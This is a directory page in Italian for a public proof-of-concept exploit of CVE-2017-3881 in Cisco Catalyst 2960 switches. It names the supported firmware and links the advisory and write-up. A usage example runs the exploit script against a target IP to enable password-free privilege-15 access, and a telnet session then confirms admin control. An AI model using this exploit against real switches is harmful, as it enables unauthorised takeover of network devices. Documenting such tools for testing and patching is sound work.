Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cisco-rce — CVE-2017-3881 Cisco Catalyst PoC di Esecuzione di Codice Remoto | Kitploit
Strumenti/GitHubGitHub/artkond/cisco-rce
Sicurezza Sistemi EmbeddedFramework di ExploitAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration Testing
GitHubartkond/cisco-rce

cisco-rce

CVE-2017-3881 Cisco Catalyst PoC di Esecuzione di Codice Remoto

Vedi Repository
213799 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-3881 Cisco IOS esecuzione di codice remota

===================

Questo repository contiene il codice Proof-of-Concept per sfruttare la vulnerabilità di esecuzione di codice remota divulgata da Cisco Systems il 17 marzo 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Descrizione

Il write-up dell'exploit è disponibile qui - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Il codice dell'exploit RCE è disponibile per il modello di switch Cisco Catalyst 2960. Questo exploit dipende dal firmware. Sono supportate due versioni di firmware:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Il codice per il denial of service è disponibile come modulo ruby di Metasploit. Dovrebbe funzionare per la maggior parte degli switch menzionati nell'advisory di Cisco (da confermare).

Esempio di utilizzo

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Autore

Artem Kondratenko https://twitter.com/artkond

Scarica lo strumento